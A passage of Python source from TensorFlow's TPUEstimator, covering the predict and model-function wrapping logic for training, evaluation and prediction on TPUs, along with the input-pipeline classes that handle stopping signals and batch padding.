return super(TPUEstimator, self).evaluate(
input_fn,
steps=steps,
hooks=hooks,
checkpoint_path=checkpoint_path,
name=name)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('evaluation_loop', sys.exc_info())
finally:
rendezvous.record_done('evaluation_loop')
rendezvous.raise_errors()
def predict(self,
input_fn,
predict_keys=None,
hooks=None,
checkpoint_path=None,
yield_single_examples=True):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.PREDICT] = rendezvous
try:
for result in super(TPUEstimator, self).predict(
input_fn=input_fn,
predict_keys=predict_keys,
hooks=hooks,
checkpoint_path=checkpoint_path,
yield_single_examples=yield_single_examples):
yield result
except Exception: # pylint: disable=broad-except
rendezvous.record_error('prediction_loop', sys.exc_info())
finally:
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
def _augment_model_fn(self, model_fn, batch_axis):
"""Returns a new model_fn, which wraps the TPU support."""
def _model_fn(features, labels, mode, config, params):
"""A Estimator `model_fn` for TPUEstimator."""
# `input_fn` is called in `train()`, `evaluate()`, and `predict()`,
# but not in `export_saved_model()`.
if self._is_input_fn_invoked:
is_export_mode = False
else:
is_export_mode = True
# Clear the bit.
self._is_input_fn_invoked = None
if is_export_mode:
if mode == _INFERENCE_ON_TPU_MODE:
_add_item_to_params(params, _USE_TPU_KEY, True)
mode = model_fn_lib.ModeKeys.PREDICT
else:
_add_item_to_params(params, _USE_TPU_KEY, False)
with self._ctx.with_mode(mode) as ctx:
model_fn_wrapper = _ModelFnWrapper(model_fn, config, params, ctx)
# examples_hook is added to training_hooks for both CPU and TPU
# execution.
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
examples_hook = ExamplesPerSecondHook(
ctx.global_batch_size,
# pylint:disable=g-long-ternary
output_dir=(self.model_dir
if not config or config.save_summary_steps
else None),
# pylint:enable=g-long-ternary
every_n_steps=self._log_every_n_steps,
every_n_secs=self._log_every_n_secs)
if ctx.is_running_on_cpu(is_export_mode=is_export_mode):
logging.info('Running %s on CPU', mode)
estimator_spec = model_fn_wrapper.call_without_tpu(
features, labels, is_export_mode=is_export_mode)
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
estimator_spec = estimator_spec._replace(
training_hooks=estimator_spec.training_hooks + (examples_hook,))
return estimator_spec
assert labels is None, '`labels` passed to `model_fn` must be `None`.'
# TPUEstimator._call_input_fn passes `input_fn` as features to here.
assert callable(features), '`input_fn` is not callable.'
input_fn = features
tpu_init_ops = []
if ctx.embedding_config and mode == model_fn_lib.ModeKeys.TRAIN:
dummy_table_variables, dummy_table_variables_init = (
tpu_embedding_gradient.create_dummy_table_variables(
ctx.embedding_config.tpu_embedding))
ctx.embedding_config.dummy_table_variables = dummy_table_variables
tpu_init_ops.append(dummy_table_variables_init)
input_holders = _InputPipeline(input_fn, batch_axis, ctx)
enqueue_ops, dequeue_fn, input_hooks, run_infeed_loop_on_coordinator = (
input_holders.generate_infeed_enqueue_ops_and_dequeue_fn())
graph = ops.get_default_graph()
for enqueue_op in enqueue_ops:
if isinstance(enqueue_op, list):
graph.get_collection_ref(_TPU_ENQUEUE_OPS).extend(enqueue_op)
else:
graph.add_to_collection(_TPU_ENQUEUE_OPS, enqueue_op)
if mode == model_fn_lib.ModeKeys.TRAIN:
compile_op, loss, host_call, scaffold_fn, training_hooks = (
_train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
if ctx.embedding_config:
g = ops.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
optimization_parameters = (
ctx.embedding_config.tpu_embedding.optimization_parameters)
if self._embedding_from_feature_columns:
embedding_variable_name_by_table, slot_variable_names_by_table = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict, optimization_parameters
)
)
else:
embedding_variable_name_by_table = None
slot_variable_names_by_table = None
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table,
slot_variable_names_by_table
))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
# scaffold_fn must be called after variables for TPU embedding has
# been created on CPU, as user might reinitialize those from some
# checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
host_ops = host_call.create_tpu_hostcall()
shutdown_hooks = []
shutdown_mode = os.environ.get('TF_TPU_GRACEFUL_SHUTDOWN_MODE',
'reset_computation')
if shutdown_mode:
if shutdown_mode == 'shutdown_worker':
finalizer_hooks = [
session_support.ShutdownLameWorkers(),
]
elif shutdown_mode == 'shutdown_all_workers':
finalizer_hooks = [
session_support.ShutdownAllWorkers(),
]
elif shutdown_mode == 'reset_computation':
finalizer_hooks = [
session_support.ResetComputation(),
]
elif not shutdown_mode:
finalizer_hooks = []
else:
raise ValueError(
'Unknown TF_TPU_GRACEFUL_SHUTDOWN_MODE "%s"' % shutdown_mode)
if finalizer_hooks:
shutdown_hooks.append(
session_support.GracefulShutdownHook(
checkpoint_prefix=self.model_dir + '/model.ckpt',
on_shutdown_hooks=finalizer_hooks))
with ops.control_dependencies([loss]):
global_step = array_ops.identity(training.get_global_step())
hooks = input_hooks + shutdown_hooks
hooks.extend([
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops,
outfeed_every_n_steps=self._config.tpu_config
.experimental_host_call_every_n_steps),
InstallSignalHandlerHook()
])
if tpu_cluster_resolver.is_running_in_gce():
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
if self._iterations_per_training_loop.unit == 'count':
examples_hook._set_steps_per_run( # pylint: disable=protected-access
self._iterations_per_training_loop.value)
hooks.append(training.LoggingTensorHook(
{
'loss': array_ops.identity(loss),
'step': global_step,
},
every_n_iter=self._log_every_n_steps,
every_n_secs=self._log_every_n_secs))
hooks.append(examples_hook)
if training_hooks:
hooks.extend(training_hooks)
chief_hooks = []
if (self._config.save_checkpoints_secs or
self._config.save_checkpoints_steps):
checkpoint_hook = training.CheckpointSaverHook(
self.model_dir,
save_secs=self._config.save_checkpoints_secs,
save_steps=self._config.save_checkpoints_steps,
scaffold=scaffold)
if self._iterations_per_training_loop.unit == 'count':
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
self._iterations_per_training_loop.value)
else:
# When estimating iterations_per_loop, set steps_per_run to an
# arbitrarily high number to force checking the global step on
# every call.
# TODO(henrytan): refactor SecondOrStepTimer to do this more
# explicitly.
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
100000)
chief_hooks.append(checkpoint_hook)
summary.scalar(model_fn_lib.LOSS_METRIC_KEY, loss)
with ops.control_dependencies([loss]):
update_ops = _sync_variables_ops(ctx)
if ctx.embedding_config:
update_ops.extend(embedding_variables_and_ops.retrieve_ops())
# Validate the TPU training graph to catch basic errors
_validate_tpu_training_graph()
train_op = control_flow_ops.group(*update_ops)
graph.add_to_collection(_TPU_TRAIN_OP, train_op)
return model_fn_lib.EstimatorSpec(
mode,
loss=loss,
training_chief_hooks=chief_hooks,
training_hooks=hooks,
train_op=train_op,
scaffold=scaffold)
if mode == model_fn_lib.ModeKeys.EVAL:
compile_op, total_loss, host_calls, scaffold_fn, eval_hooks = (
_eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
if ctx.embedding_config:
g = ops.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
if self._embedding_from_feature_columns:
embedding_variable_name_by_table, _ = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict)
)
else:
embedding_variable_name_by_table = None
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table
))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
# scaffold_fn must be called after variables for TPU embedding has
# been created on CPU, as user might reinitialize those from some
# checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
iterations_per_loop_var = _create_or_get_iterations_per_loop()
mean_loss = math_ops.div(
total_loss,
math_ops.cast(iterations_per_loop_var, dtype=total_loss.dtype))
with ops.control_dependencies([mean_loss]):
# After TPU evaluation computation is done (the mean_loss tensor),
# reads all variables back from TPU and updates the eval step
# counter properly
internal_ops_to_run = _sync_variables_ops(ctx)
internal_ops_to_run.append(
_increase_eval_step_op(iterations_per_loop_var))
host_call_ret = host_calls.create_tpu_hostcall()
eval_metric_ops = {}
eval_update_ops = []
eval_metrics = host_call_ret.get('eval_metrics', {})
if eval_metrics:
# Creates a dummy metric update_op for all metrics. Estimator
# expects all metrics in `eval_metric_ops` have update_op and calls
# them one by one. The real metric update_ops are invoked in a
# separated thread. So, here give Estimator the dummy op for all
# metrics.
with ops.control_dependencies(internal_ops_to_run):
dummy_update_op = control_flow_ops.no_op()
for k, v in eval_metrics.items():
eval_metric_ops[k] = (v[0], dummy_update_op)
eval_update_ops.append(v[1])
else:
# If no eval metrics are passed, create an identity node for the
# loss and add `internal_ops_to_run` to its dependencies. So
# `internal_ops_to_run` can be executed.
with ops.control_dependencies(internal_ops_to_run):
mean_loss = array_ops.identity(mean_loss)
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
eval_update_ops + host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.evaluation_master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops)
] + input_hooks
if tpu_cluster_resolver.is_running_in_gce():
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if eval_hooks:
hooks.extend(eval_hooks)
return model_fn_lib.EstimatorSpec(
mode,
loss=mean_loss,
evaluation_hooks=hooks,
eval_metric_ops=eval_metric_ops,
scaffold=scaffold)
# Predict
assert mode == model_fn_lib.ModeKeys.PREDICT
(compile_op, dummy_predict_op, host_calls,
scaffold_fn, prediction_hooks) = _predict_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn)
scaffold = _get_scaffold(scaffold_fn)
with ops.control_dependencies([dummy_predict_op]):
internal_ops_to_run = _sync_variables_ops(ctx)
with ops.control_dependencies(internal_ops_to_run):
dummy_predict_op = control_flow_ops.no_op()
# In train and evaluation, the main TPU program is passed to monitored
# training session to run. Infeed enqueue and outfeed dequeue are
# executed in side threads. This is not the configuration for
# prediction mode.
#
# For prediction, the Estimator executes the EstimatorSpec.predictions
# directly and yield the element (via generator) to call site. So, the
# outfeed based prediction must be passed to MonitoredSession directly.
# Other parts of the TPU execution are organized as follows.
#
# 1. All outfeed based Tensors must be grouped with predictions Tensors
# to form a single invocation. This avoid the issue we might trigger
# multiple outfeeds incorrectly. To achieve this, `host_call` is
# placed in control_dependencies of `stopping_signals`, and
# `stopping_signals` is passed into _StoppingPredictHook, which sets
# the `stopping_signals` as SessionRunArgs. MonitoredSession merges
# all SessionRunArgs with the fetch in session.run together.
#
# 2. The TPU program (dummy_predict_op) and enqueue_ops (infeed Enqueue)
# are grouped together. They will be launched once and only once in
# side threads and they quit naturally according to the SAME stopping
# condition.
enqueue_ops.append(dummy_predict_op)
host_call_ret = host_calls.create_tpu_hostcall()
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
predictions = host_call_ret['predictions']
_verify_cross_hosts_transfer_size(
predictions,
message=(
'The estimated size for TPUEstimatorSpec.predictions is too '
'large.'))
signals = host_call_ret['signals']
with ops.control_dependencies(host_ops):
host_ops = [] # Empty, we do do not need it anymore.
scalar_stopping_signal = _StopSignals.as_scalar_stopping_signal(
signals)
predictions = _PaddingSignals.slice_tensor_or_dict(
predictions, signals)
hooks = [
_StoppingPredictHook(scalar_stopping_signal),
TPUInfeedOutfeedSessionHookForPrediction(
ctx, enqueue_ops, host_ops, rendezvous=self._rendezvous[mode],
tpu_compile_op=compile_op,
master=self._config.master,
session_config=self._session_config),
] + input_hooks
if prediction_hooks:
hooks.extend(prediction_hooks)
return model_fn_lib.EstimatorSpec(
mode,
prediction_hooks=hooks,
predictions=predictions,
scaffold=scaffold)
return _model_fn
def _export_output_to_tensors(export_output):
"""Get a list of `Tensors` used in `export_output`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
Returns:
a list of tensors used in export_output.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
return [export_output.scores, export_output.classes]
elif isinstance(export_output, export_output_lib.RegressionOutput):
return [export_output.value]
elif isinstance(export_output, export_output_lib.PredictOutput):
return list(export_output.outputs.values())
else:
raise ValueError(
'`export_output` must be have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _clone_export_output_with_tensors(export_output, tensors):
"""Clones `export_output` but with new `tensors`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
tensors: a list of `Tensors` used to construct a new `export_output`.
Returns:
A dict similar to `export_output` but with `tensors`.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
if len(tensors) != 2:
raise ValueError('tensors must be of length 2; '
'got {}.'.format(len(tensors)))
return export_output_lib.ClassificationOutput(*tensors)
elif isinstance(export_output, export_output_lib.RegressionOutput):
if len(tensors) != 1:
raise ValueError('tensors must be of length 1; '
'got {}'.format(len(tensors)))
return export_output_lib.RegressionOutput(*tensors)
elif isinstance(export_output, export_output_lib.PredictOutput):
return export_output_lib.PredictOutput(
dict(zip(export_output.outputs.keys(), tensors)))
else:
raise ValueError(
'`export_output` must be have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
) = model_fn_wrapper.convert_to_single_tpu_eval_step(dequeue_fn)
@tpu_function.on_device_training_loop
def multi_tpu_eval_steps_on_single_shard():
return training_loop.repeat(iterations_per_loop_var, single_tpu_eval_step,
[_ZERO_LOSS])
(compile_op, loss,) = tpu.split_compile_and_shard(
multi_tpu_eval_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
return (compile_op, loss, host_calls, captured_scaffold_fn,
captured_eval_hooks.get())
def _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_train_step, host_call, captured_scaffold_fn,
captured_training_hooks) = (
model_fn_wrapper.convert_to_single_tpu_train_step(dequeue_fn))
@tpu_function.on_device_training_loop
def multi_tpu_train_steps_on_single_shard():
outputs = training_loop.while_loop(
lambda i, loss : i < iterations_per_loop_var,
lambda i, loss : [i + 1, single_tpu_train_step(i)],
inputs=[0, _INITIAL_LOSS])
return outputs[1:]
(compile_op, loss,) = tpu.split_compile_and_shard(
multi_tpu_train_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
return (compile_op, loss, host_call, captured_scaffold_fn,
captured_training_hooks.get())
def _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
(single_tpu_predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks
) = model_fn_wrapper.convert_to_single_tpu_predict_step(dequeue_fn)
@tpu_function.on_device_training_loop
def multi_tpu_predict_steps_on_single_shard():
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
inputs = [_StopSignals.NON_STOPPING_SIGNAL]
outputs = training_loop.while_loop(
cond, single_tpu_predict_step, inputs=inputs, name=b'loop')
return outputs
(compile_op, dummy_predict_op,) = tpu.split_compile_and_shard(
multi_tpu_predict_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
dummy_predict_op = dummy_predict_op[0]
return (compile_op, dummy_predict_op, host_calls, captured_scaffold_fn,
captured_predict_hooks.get())
def _wrap_computation_in_while_loop(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def computation(i):
with ops.control_dependencies(op_fn()):
return i + 1
iterations_per_loop_var = _create_or_get_iterations_per_loop()
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
iterations = array_ops.identity(iterations_per_loop_var)
return control_flow_ops.while_loop(
lambda i: i < iterations,
computation, [constant_op.constant(0)],
parallel_iterations=1)
def _wrap_computation_in_while_loop_with_stopping_signals(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
def computation(unused_scalar_stopping_signal):
return_value = op_fn()
execute_ops = return_value['ops']
signals = return_value['signals']
with ops.control_dependencies(execute_ops):
return _StopSignals.as_scalar_stopping_signal(signals)
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
return control_flow_ops.while_loop(
cond,
computation, [_StopSignals.NON_STOPPING_SIGNAL],
parallel_iterations=1)
def _validate_tpu_training_graph():
"""Validate graph before running distributed training.
Raises:
ValueError: If the graph seems invalid for running on device
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return # b/124241278
operations = ops.get_default_graph().get_operations()
# Check if there is atleast one CrossReplicaSum operation in the graph
# This should be introduced by using the CrossShardOptimizer wrapper
cross_replica_sum_ops = [
o for o in operations if o.type == _CROSS_REPLICA_SUM_OP
]
if not cross_replica_sum_ops:
raise ValueError(
'CrossShardOptimizer must be used for model training on TPUs.')
class _CapturedObject(object):
"""A placeholder to capture an object.
This is useful when we need to capture a Python object in the Tensorflow
control flow body function and use it outside the control flow.
"""
def __init__(self):
self._object = None
self._captured = False
def capture(self, o):
if self._captured:
raise RuntimeError(
'InternalError: Object can capture only once. Please file bug.')
self._captured = True
self._object = o
def get(self):
if not self._captured:
raise RuntimeError(
'InternalError: Object is not captured properly before `get`. '
'Please file bug.')
return self._object
def _get_scaffold(captured_scaffold_fn):
"""Retrieves the Scaffold from `captured_scaffold_fn`."""
with _CapturingContext(message='Inside scaffold_fn'):
scaffold_fn = captured_scaffold_fn.get()
if scaffold_fn:
scaffold = scaffold_fn()
if scaffold is None:
raise ValueError(
'TPUEstimatorSpec.scaffold_fn returns None, which is not allowed')
else:
scaffold = None
if scaffold:
wrapped_finalize = scaffold.finalize
def _finalize():
with _CapturingContext('Inside Scaffold.finalize'):
wrapped_finalize()
scaffold.finalize = _finalize
return scaffold
class _CapturingContext(control_flow_ops.ControlFlowContext):
"""Tracks references to Tensors defined in TPU replication."""
def __init__(self, message):
control_flow_ops.ControlFlowContext.__init__(self)
self._message = message
def to_control_flow_context_def(self, context_def, export_scope=None):
# pylint: disable=useless-super-delegation
# NOTE(slebedev): the method is required by `ControlFlowContext`.
super(_CapturingContext, self).to_control_flow_context_def(
context_def, export_scope)
def AddOp(self, op): # pylint: disable=invalid-name
for c in op.inputs:
if tpu._TPU_REPLICATE_ATTR in c.op.node_def.attr: # pylint: disable=protected-access
raise ValueError('{}: Op {} depends on TPU computation {}, '
'which is not allowed.'.format(self._message, op, c))
def __enter__(self):
# pylint: disable=protected-access
self._g = ops.get_default_graph()
self._old = self._g._get_control_flow_context()
self._g._set_control_flow_context(self)
# pylint: enable=protected-access
def __exit__(self, _, __, ___): # pylint: disable=invalid-name
self._g._set_control_flow_context(self._old) # pylint: disable=protected-access
class _Inputs(object):
"""A data structure representing the input_fn returned values.
This also supports the returned value from input_fn as `Dataset`.
"""
def __init__(self, features=None, labels=None, dataset=None, signals=None):
if dataset is not None and (features is not None or labels is not None or
signals is not None):
raise RuntimeError('Internal Error: Either (features and labels) or '
'dataset should be provided, not both. Please file '
'bug')
self._features = features
self._labels = labels
self._signals = signals
self._dataset = dataset
self._iterator = None
@staticmethod
def from_input_fn(return_values):
"""Returns an `_Inputs` instance according to `input_fn` return value."""
if isinstance(return_values, dataset_ops.DatasetV2):
dataset = return_values
return _Inputs(dataset=dataset)
features, labels = _Inputs._parse_inputs(return_values)
return _Inputs(features, labels)
@staticmethod
def _parse_inputs(return_values):
if isinstance(return_values, tuple):
features, labels = return_values
else:
features, labels = return_values, None
return features, labels
@property
def is_dataset(self):
"""Returns True if the return value from input_fn is Dataset."""
return self._dataset is not None
def dataset_initializer(self):
"""Returns the dataset's initializer.
The initializer must be run before calling `features_and_labels`.
"""
self._iterator = dataset_ops.make_initializable_iterator(self._dataset)
return self._iterator.initializer
def features_and_labels(self):
"""Gets `features` and `labels`."""
if self.is_dataset:
if self._iterator is None:
raise RuntimeError('Internal error: Must run dataset_initializer '
'before calling features_and_labels(). Please file '
'a bug!')
return _Inputs._parse_inputs(self._iterator.get_next())
return (self._features, self._labels)
def signals(self):
return self._signals
@property
def dataset(self):
return self._dataset
class _InputsWithStoppingSignals(_Inputs):
"""Inputs with `_StopSignals` inserted into the dataset."""
def __init__(self,
dataset,
batch_size,
add_padding=False,
num_invocations_per_step=1):
assert dataset is not None
user_provided_dataset = dataset.map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=False, batch_size=batch_size, add_padding=add_padding))
if num_invocations_per_step == 1:
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
else:
# We append (2 * num_invocations_per_step - 1) batches for exhausting the
# user_provided_dataset and stop properly.
# For example, if num_invocations_per_step is 2, we append 3 additional
# padding batches: b1, b2, b3.
# If user_provided_dataset contains two batches: a1, a2
# Step 1: [a1, a2]
# Step 2: [b1, b2] -> STOP
# If user_provided_dataset contains three batches: a1, a2, a3.
# The training loops:
# Step 1: [a1, a2]
# Step 2: [a3, b1]
# Step 3: [b2, b3] -> STOP.
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
final_batch_dataset = final_batch_dataset.repeat(
2 * num_invocations_per_step - 1)
def _set_mask(data_dict):
signals = data_dict['signals']
signals['padding_mask'] = array_ops.ones_like(signals['padding_mask'])
data_dict['signals'] = signals
return data_dict
# Mask out the extra batch.
final_batch_dataset = final_batch_dataset.map(_set_mask)
dataset = user_provided_dataset.concatenate(final_batch_dataset).prefetch(2)
super(_InputsWithStoppingSignals, self).__init__(dataset=dataset)
self._current_inputs = None
def features_and_labels(self):
if self._current_inputs is not None:
raise RuntimeError(
'Internal Error: The previous inputs have not been properly '
'consumed. First call features_and_labels, then call signals.')
inputs_with_signals = self._iterator.get_next()
features = inputs_with_signals['features']
labels = inputs_with_signals.get('labels')
self._current_inputs = inputs_with_signals
return features, labels
def signals(self):
"""Returns the `Signals` from `_Inputs`."""
if self._current_inputs is None:
raise RuntimeError(
'Internal Error: The current inputs have not been properly '
'generated. First call features_and_labels, then call signals.')
signals = self._current_inputs['signals']
self._current_inputs = None
return signals
@staticmethod
def insert_stopping_signal(stop, batch_size, add_padding=False):
"""Inserts stopping_signal into dataset via _map_fn.
Here we change the data structure in the dataset, such that the return value
is a dictionary now and `features`, `labels`, and `signals` are three
distinguished keys in that dict. This provides a better structure, which
eases the process to decompose the inputs (see `features_and_labels`).
Args:
stop: bool, state of current stopping signals.
batch_size: int, batch size.
add_padding: bool, whether to pad the tensor to full batch size.
Returns:
A map_fn passed to dataset.map API.
"""
def _map_fn(*args):
"""The map fn to insert signals."""
if len(args) == 1:
# Unpack the single Tensor/dict argument as features. This is required
# for the input_fn returns no labels.
args = args[0]
features, labels = _Inputs._parse_inputs(args)
new_input_dict = {}
if add_padding:
padding_mask, features, labels = (
_PaddingSignals.pad_features_and_labels(features, labels,
batch_size))
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
else:
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
padding_mask = None
new_input_dict['signals'] = _StopSignals(
stop=stop, batch_size=batch_size,
padding_mask=padding_mask).as_dict()
return new_input_dict
return _map_fn
class _StopSignals(object):
"""Signals class holding all logic to handle TPU stopping condition."""
NON_STOPPING_SIGNAL = False
STOPPING_SIGNAL = True
def __init__(self, stop, batch_size, padding_mask=None):
self._stop = stop
self._batch_size = batch_size
self._padding_mask = padding_mask
def as_dict(self):
"""Returns the signals as Python dict."""
shape = [self._batch_size, 1]
dtype = dtypes.bool
if self._stop:
stopping = array_ops.ones(shape=shape, dtype=dtype)
else:
stopping = array_ops.zeros(shape=shape, dtype=dtype)
signals = {'stopping': stopping}
if self._padding_mask is not None:
signals['padding_mask'] = self._padding_mask
return signals
@staticmethod
def as_scalar_stopping_signal(signals):
return array_ops.identity(signals['stopping'][0][0])
@staticmethod
def should_stop(scalar_stopping_signal):
"""Detects whether scalar_stopping_signal indicates stopping."""
if isinstance(scalar_stopping_signal, ops.Tensor):
# STOPPING_SIGNAL is a constant True. Here, the logical_and is just the TF
# way to express the bool check whether scalar_stopping_signal is True.
return math_ops.logical_and(scalar_stopping_signal,
_StopSignals.STOPPING_SIGNAL)
else:
# For non Tensor case, it is used in SessionRunHook. So, we cannot modify
# the graph anymore. Here, we use pure Python.
return bool(scalar_stopping_signal)
class _PaddingSignals(object):
"""Signals class holding all logic to handle padding."""
@staticmethod
def pad_features_and_labels(features, labels, batch_size):
"""Pads out the batch dimension of features and labels."""
real_batch_size = array_ops.shape(
_PaddingSignals._find_any_tensor(features))[0]
batch_size_tensor = constant_op.constant(batch_size, dtypes.int32)
check_greater = check_ops.assert_greater_equal(
batch_size_tensor,
real_batch_size,
data=(batch_size_tensor, real_batch_size),
message='The real batch size should not be greater than batch_size.')
with ops.control_dependencies([check_greater]):
missing_count = batch_size_tensor - real_batch_size
def pad_single_tensor(tensor):
"""Pads out the batch dimension of a tensor to the complete batch_size."""
rank = len(tensor.shape)
assert rank > 0
padding = array_ops.stack([[0, missing_count]] + [[0, 0]] * (rank - 1))
padded_shape = (batch_size,) + tuple(tensor.shape[1:])
padded_tensor = array_ops.pad(tensor, padding)
padded_tensor.set_shape(padded_shape)
return padded_tensor
def nest_pad(tensor_or_dict):
return nest.map_structure(pad_single_tensor, tensor_or_dict)
features = nest_pad(features)
if labels is not None:
labels = nest_pad(labels)
padding_mask = _PaddingSignals._padding_mask(real_batch_size, missing_count,
batch_size)
return padding_mask, features, labels
@staticmethod
def slice_tensor_or_dict(tensor_or_dict, signals):
"""Slice the real Tensors according to padding mask in signals."""
padding_mask = signals['padding_mask']
batch_size = array_ops.shape(padding_mask)[0]
def verify_batch_size(tensor):
check_batch_size = math_ops.equal(batch_size, tensor.shape[0])
with ops.control_dependencies([check_batch_size]):
return array_ops.identity(tensor)
def slice_single_tensor(tensor):
rank = len(tensor.shape)
assert rank > 0
real_batch_size = batch_size - math_ops.reduce_sum(padding_mask)
return verify_batch_size(tensor)[0:real_batch_size]
# As we split the Tensors to all TPU cores and concat them back, it is
# important to ensure the real data is placed before padded ones, i.e.,
# order is preserved. By that, the sliced padding mask should have all 0's.
# If this assertion failed, # the slice logic here would not hold.
sliced_padding_mask = slice_single_tensor(padding_mask)
assert_padding_mask = math_ops.equal(
math_ops.reduce_sum(sliced_padding_mask), 0)
with ops.control_dependencies([assert_padding_mask]):
should_stop = _StopSignals.should_stop(
_StopSignals.as_scalar_stopping_signal(signals))
is_full_batch = math_ops.equal(math_ops.reduce_sum(padding_mask), 0)
def slice_fn(tensor):
# If the current batch is full batch or part of stopping signals, we do
# not need to slice to save performance.
return control_flow_ops.cond(
math_ops.logical_or(should_stop, is_full_batch),
(lambda: verify_batch_size(tensor)),
(lambda: slice_single_tensor(tensor)))
return nest.map_structure(slice_fn, tensor_or_dict)
@staticmethod
def _find_any_tensor(batch_features):
tensors = [
x for x in nest.flatten(batch_features) if isinstance(x, ops.Tensor)
]
if not tensors:
raise ValueError('Cannot find any Tensor in features dict.')
return tensors[0]
@staticmethod
def _padding_mask(real_batch_size, missing_count, batch_size):
padding_mask = array_ops.concat([
array_ops.zeros((real_batch_size,), dtype=dtypes.int32),
array_ops.ones((missing_count,), dtype=dtypes.int32)
],
axis=0)
padding_mask.set_shape((batch_size,))
return padding_mask
def _verify_cross_hosts_transfer_size(tensor_dict, message):
total_size = 0
tensor_structure = {}
for key, tensor in tensor_dict.items():
shape = tensor.shape
size = np.product(shape) * tensor.dtype.size
tensor_structure[key] = shape
total_size += size
if total_size >= _ONE_GIGABYTE:
raise ValueError(
'{} The transfer size is larger than the protobuf limit. Please '
'consider to use Tensors with smaller shapes or reduce batch '
'size. Given:\n'
'{}'.format(
message, '\n'.join([
' -- Key: {}, Shape: {}'.format(k, v)
for k, v in tensor_structure.items()
])))
def _add_item_to_params(params, key, value):
"""Adds a new item into `params`."""
if hasattr(params, 'set_hparam'):
# For HParams, we need to use special API.
if key in params:
params.set_hparam(key, value)
else:
params.add_hparam(key, value)
else:
# Now params is Python dict.
params[key] = value
